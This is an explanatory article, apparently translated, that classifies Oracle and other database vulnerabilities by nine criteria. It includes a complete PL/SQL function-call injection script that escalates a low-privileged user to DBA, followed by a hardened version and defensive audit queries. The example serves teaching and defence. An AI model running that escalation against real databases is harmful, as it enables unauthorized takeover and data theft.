Analyzing database security vulnerabilities from nine perspectives
Database vulnerabilities take many forms. Because every real-world incident has several dimensions, the same vulnerability can be classified from several perspectives, and each perspective highlights a different aspect of how to defend against it.
The Anhua Jinhe database security lab classifies database vulnerabilities from the following nine perspectives:
1. By exploitation scope
Remote vulnerabilities: vulnerabilities an attacker can exploit directly over the network to attack the database. These are the most harmful: any database reachable from the Internet can be attacked at will, and they are the class attackers exploit most often.
Local vulnerabilities: vulnerabilities that can be exploited only once the attacker already has access to the host or an account on the database. The typical case is local privilege escalation, which is common in database products and lets an ordinary user obtain the highest administrative privilege.
2. By severity
Severity is divided into three levels based on the CVSS score: 0.0-3.9 (LOW), 4.0-6.9 (MEDIUM) and 7.0-10.0 (HIGH). The level reflects the impact a vulnerability has on the database: the greater the damage to confidentiality, integrity and availability, the higher the severity. Examples:
CVE-2006-1705 is rated low. It does not affect database system files; at most it allows some database configuration files to be modified, without affecting database operation.
CVE-2006-1871 is rated medium. At most it leaks some information, may allow some database configuration files to be modified, and may degrade database performance or, with low probability, drop connections.
CVE-2006-3702 is rated high. It can leak all database system files, corrupt the database completely, and may take the database down entirely.
3. By affected operating system
Operating systems are diverse and each has many versions. They are grouped into five categories: DOS, Windows, Unix, Linux and other. Because the addresses an exploit must hit depend directly on the exact OS version, the classification has to go down to the specific version. Taking Oracle as an example, different operating systems apply different defenses against buffer overflows, so an overflow exploit written for one platform essentially never works on another.
4. By scope of harm
The harm of a vulnerability is the damage caused when it is exploited. Here it means direct harm to the database, or harm done to other systems by way of the database. Four kinds:
Harm to the database itself: the attack targets the database. These vulnerabilities are described in detail in section 5, "By attack technique", below.
Harm to the server hosting the database: the server is attacked through the database. Methods include running OS commands through PL/SQL, through Java, directly through job scheduling, and through ALTER SYSTEM; in some Oracle versions, PL/SQL native compilation can be abused to run OS commands.
Harm to the file system of the host: the file system on the server is attacked through the database. Methods include accessing the file system through the UTL_FILE package, through Java, and through the operating system's environment variables.
Harm to other hosts on the network: the database is used as a pivot to attack other databases and services on the same network.
5. By attack technique
5.1 SQL injection
The SQL injection discussed here is not injection through a web front end but injection aimed at the database itself, typically PL/SQL injection; the two are very different. PL/SQL injection is simple:
malformed strings or other crafted input aimed at a database vulnerability or defect are embedded in an otherwise normal SQL statement using concatenation, comments and quote or escape characters. The crafted input gains progressively higher privileges in the database until it reads sensitive data or obtains DBA rights outright, which in turn endangers the database host and the surrounding network.
Methods include:
Code injection. Code injection is found mostly where a single call can execute multiple SQL statements; the attacker appends malicious EXECUTE commands to a normal statement.
Function call injection. Function call injection is a variant of code injection but is the real core of PL/SQL injection: it uses a flaw in database code to inject a malicious statement into it. Specific forms include:
Injecting SELECT/DELETE/INSERT/UPDATE statements
Injecting a function call
Injecting an anonymous PL/SQL block
Cursor injection
Trigger injection
Lateral privilege escalation
Each of these has sub-techniques. The best-known lateral escalation paths turn a single system privilege into DBA: CREATE ANY TRIGGER to DBA, CREATE ANY VIEW to DBA, EXECUTE ANY PROCEDURE to DBA, and CREATE PROCEDURE to DBA.
Buffer overflow injection. This is distinct from the buffer overflows in 5.2 below: here a parameter passed to a database system function exceeds the function's length limit and overflows its buffer.
Classic SQL injection. Most commonly, the WHERE clause of a statement is modified so that it returns a different result set and discloses sensitive information about the database.
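The following is an added, constructed example (not code from the original article) of function call injection and the privilege escalation it enables. A definer-rights procedure owned by SYS concatenates its argument into dynamic SQL; a low-privileged user injects a call to an invoker-rights function of their own, so the function's GRANT runs as SYS. All schema and object names (SYS.COUNT_ACCOUNTS, APP.ACCOUNTS, ATTACKER.GET_DBA) are assumptions for illustration; the hardened version at the end uses bind variables and invoker rights.

```sql
-- Constructed example; SYS.COUNT_ACCOUNTS, APP.ACCOUNTS and ATTACKER.GET_DBA are
-- assumed names. ATTACKER is an ordinary account holding only CREATE SESSION and
-- CREATE PROCEDURE.

-- 1. Vulnerable code: a definer-rights procedure (runs with SYS's privileges)
--    that splices caller input into the statement text and is executable by anyone.
CREATE OR REPLACE PROCEDURE sys.count_accounts (p_owner IN VARCHAR2)
IS
  l_cnt NUMBER;
BEGIN
  -- p_owner becomes part of the SQL text: injectable.
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM app.accounts WHERE owner = ''' || p_owner || ''''
    INTO l_cnt;
  DBMS_OUTPUT.PUT_LINE('accounts owned by ' || p_owner || ': ' || l_cnt);
END;
/
GRANT EXECUTE ON sys.count_accounts TO PUBLIC;

-- 2. Function call injection (run as ATTACKER).
--    AUTHID CURRENT_USER makes the function invoker-rights: when the SYS-owned
--    definer-rights procedure evaluates it, the "current user" is SYS, so the
--    GRANT executes with SYS's privileges. The autonomous transaction allows DDL
--    to run from inside a query (otherwise ORA-14552).
CREATE OR REPLACE FUNCTION attacker.get_dba RETURN VARCHAR2
AUTHID CURRENT_USER
IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO attacker';
  COMMIT;
  RETURN 'x';
END;
/
GRANT EXECUTE ON attacker.get_dba TO PUBLIC;

-- The argument closes the string literal and adds a call in the WHERE clause.
-- Statement actually executed by the procedure:
--   SELECT COUNT(*) FROM app.accounts WHERE owner = 'x' OR attacker.get_dba() = 'x'
BEGIN
  sys.count_accounts('x'' OR attacker.get_dba() = ''x');
END;
/
-- Check (as ATTACKER, after reconnecting so the new role is enabled):
SELECT granted_role FROM user_role_privs WHERE granted_role = 'DBA';

-- 3. Hardened version: the input is passed as a bind variable, so it can never
--    change the statement text, and the procedure is invoker-rights, so even a
--    successful injection would run only with the caller's own privileges.
--    If an identifier (not a value) must be dynamic, validate it with
--    DBMS_ASSERT.SQL_OBJECT_NAME / SIMPLE_SQL_NAME before concatenating.
CREATE OR REPLACE PROCEDURE sys.count_accounts (p_owner IN VARCHAR2)
AUTHID CURRENT_USER
IS
  l_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM app.accounts WHERE owner = :owner'
    INTO l_cnt USING p_owner;
  DBMS_OUTPUT.PUT_LINE('accounts owned by ' || p_owner || ': ' || l_cnt);
END;
/
```

The injected function is only evaluated for rows the WHERE clause actually tests, so APP.ACCOUNTS must contain at least one row for the grant to fire. Oracle 12c added the INHERIT PRIVILEGES check specifically to stop a low-privileged owner's invoker-rights code from borrowing a powerful caller's privileges this way; the attack step above assumes a pre-12c database or one where that check has been granted away, which is itself worth auditing.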
5.2 Buffer overflow
A buffer overflow occurs when data from a source buffer is copied into a target buffer smaller than itself and the database performs no bounds check on the stored data, so the copy runs past the end of the target buffer. Memory overwritten beyond the buffer can change the program's control flow, letting the attacker take over the operating system, or can crash the process and deny service. Buffer overflows fall into four types: static data overflow, stack overflow, heap overflow and format string bugs.
Types:
Stack overflow. The most common form. There are two approaches: change the function's logic by overwriting local variables next to the buffer, or overwrite the function's saved return address so that control passes to attacker-chosen code. The second is the common one.
Heap overflow. Similar to stack overflow, but heap addresses are allocated dynamically and cannot be predicted exactly, so exploitation typically relies on the DWORD shoot technique: corrupting heap block metadata so that the allocator's unlink operation writes an attacker-chosen 4-byte value to an attacker-chosen address.
Static data area overflow. The static data area holds global variables and uninitialized static variables laid out contiguously; overflowing a buffer stored there is a static data area overflow.
Format string bugs. The classic case is a *printf() family function called with an attacker-controlled format string. Three properties are abused: *printf() takes a variable number of arguments, so extra directives read whatever happens to be on the stack; the %n directive writes the number of bytes output so far to a pointer argument, giving an arbitrary memory write; and width specifiers such as %123x control how many bytes have been output, and therefore the value written, which lets the attacker set a jump address.
5.3 Other techniques
Weak passwords. Passwords that are easy to guess or to crack with tools. Most are database default passwords; others are generated from predictable defaults.
Credential stuffing. Logging in to the target database with usernames and passwords collected from other services. Since many people reuse the same account and password, the attacker stands a good chance of logging in and stealing a large amount of sensitive data.
Brute force. A dictionary (password list) is tried against the database's usernames until a working username and password combination is found.
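The following audit queries are an added example (constructed here, not part of the original article) that check one Oracle database for the conditions described above: accounts still on vendor default passwords (5.3), PUBLIC execute on the packages that reach the OS, file system and network (section 4), and the ANY privileges behind the lateral escalation paths of 5.1. They assume Oracle 12c or later for the ORACLE_MAINTAINED column, a session that can read the DBA_* views, and the example account names APP_BATCH and APP_USER in the commented remediation.

```sql
-- Constructed audit queries; assumes Oracle 12c+ (ORACLE_MAINTAINED) and DBA_* access.
-- APP_BATCH and APP_USER in the remediation comments are assumed account names.

-- 1. Open accounts whose password is a known vendor default (weak-password class).
SELECT d.username, u.account_status
  FROM dba_users_with_defpwd d
  JOIN dba_users u ON u.username = d.username
 WHERE u.account_status = 'OPEN'
 ORDER BY d.username;

-- 2. PUBLIC execute on packages that reach the host OS, file system or network:
--    the "harm to the server", "harm to the file system" and "harm to other hosts"
--    paths of section 4.
SELECT owner, table_name, privilege
  FROM dba_tab_privs
 WHERE grantee = 'PUBLIC'
   AND privilege = 'EXECUTE'
   AND table_name IN ('UTL_FILE', 'DBMS_JAVA', 'DBMS_JAVA_TEST',
                      'DBMS_SCHEDULER', 'DBMS_JOB',
                      'UTL_HTTP', 'UTL_TCP', 'UTL_SMTP', 'UTL_INADDR')
 ORDER BY table_name;

-- 3. Direct system privileges on non-Oracle accounts that are one step from DBA
--    (the lateral escalation paths of 5.1, plus the ALTER SYSTEM path of section 4).
SELECT p.grantee, p.privilege, p.admin_option
  FROM dba_sys_privs p
  JOIN dba_users u ON u.username = p.grantee
 WHERE u.oracle_maintained = 'N'
   AND p.privilege IN ('CREATE ANY TRIGGER', 'CREATE ANY VIEW',
                       'CREATE ANY PROCEDURE', 'EXECUTE ANY PROCEDURE',
                       'CREATE ANY DIRECTORY', 'ALTER SYSTEM',
                       'GRANT ANY PRIVILEGE', 'GRANT ANY ROLE', 'BECOME USER')
 ORDER BY p.grantee, p.privilege;

-- 4. The same privileges arriving through a directly granted role
--    (one level of nesting only; recurse through ROLE_ROLE_PRIVS for deeper chains).
SELECT r.grantee, r.granted_role, rp.privilege
  FROM dba_role_privs r
  JOIN dba_users u ON u.username = r.grantee
  JOIN role_sys_privs rp ON rp.role = r.granted_role
 WHERE u.oracle_maintained = 'N'
   AND rp.privilege LIKE '%ANY%'
 ORDER BY r.grantee, r.granted_role, rp.privilege;

-- Remediation pattern. Run only after confirming which application code depends
-- on each grant; Oracle-supplied components may rely on some PUBLIC grants.
-- REVOKE EXECUTE ON utl_file FROM PUBLIC;
-- GRANT EXECUTE ON utl_file TO app_batch;
-- REVOKE CREATE ANY TRIGGER FROM app_user;
```

Query 1 only recognizes the default passwords Oracle ships hashes for; it does not replace a dictionary check against the password verifiers. Query 4 reports privileges that are visible through the role but, as section 5.1 notes, roles are disabled inside definer-rights code, so the direct grants in query 3 are the ones that matter most for PL/SQL injection.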
6. By root cause
Input validation errors. Input values such as strings and packets are not properly validated, so malformed input reaches database system functions and has unpredictable consequences for the database.
Boundary condition errors. A database is large and complex software with intricate internal call chains; the boundary of an input value is sometimes handled inconsistently between callers, and the differing limits affect the database.
Buffer overflow errors. Some database functions lack length limits and checks on their parameter values, exposing a vulnerability.
Access validation errors. These mostly arise in the database's network listener: attackers send spoofed packets to it and obtain important information about the database.
Unexpected condition errors. Database logic is complex, and rarely triggered branches are not found in time because of release schedules and other constraints.
Other errors. Beyond the five causes above, most remaining vulnerabilities come from operating and configuring the database contrary to the vendor's official guidance, or from design defects in the database itself.
7. By exploitation result
Unauthorized access. Reading or writing data that should be inaccessible. This is usually the attacker's core goal and can be disastrous (for example, bank records being altered).
Privilege escalation. A low-privileged user's permissions are raised step by step until the user becomes DBA; the attacker can then steal the database's core data with the escalated account.
Denial of service. Forcing the target database to stop providing service, one of the most common attacks. Flooding the database port is only a small part of it: anything that suspends the database service or even crashes the host is a denial of service.
Operating system takeover. In a network buffer-overflow attack, the attacker hijacks the saved return address on the stack of the vulnerable function, diverting control flow to attacker-supplied shellcode. When the shellcode launches cmd (on Windows), the attacker can control the operating system under the database's OS account, and from there the whole host.
Authentication bypass. Flaws in the authentication system are used to reach the system without credentials, usually in order to escalate privileges or access data directly.
8. By location of the vulnerability within the database
Similar functions have different names in different databases; this document uses Oracle as the example and divides vulnerabilities into TNS (listener) vulnerabilities, Aurora GIOP server vulnerabilities, XDB component vulnerabilities, DBMS_CDC_IMPDP vulnerabilities, LT (Workspace Manager) component vulnerabilities, DBMS_CDC_SUBSCRIBE and DBMS_CDC_ISUBSCRIBE vulnerabilities, MDSYS.SDO_GEOM_TRIG_INS1 and SYS.CDC_DROP_CTABLE_BEFORE trigger vulnerabilities, dbms_schrd.pdf, UTL_FILE vulnerabilities, Data Redaction vulnerabilities, and audit vulnerabilities.
9. By age of the vulnerability
Long-known vulnerabilities. The vendor has released a patch or workaround and the issue is widely known; most affected systems have already been fixed, so these are the least harmful.
Newly disclosed vulnerabilities. The vendor has only just released a patch or workaround and few people know about it, so these are more harmful than the previous category: once a public exploit appears, large numbers of unpatched databases come under attack. This is the category attackers exploit most.
0-day vulnerabilities. Not public; traded privately. These are usually the most dangerous and are typically used by organized attacker groups.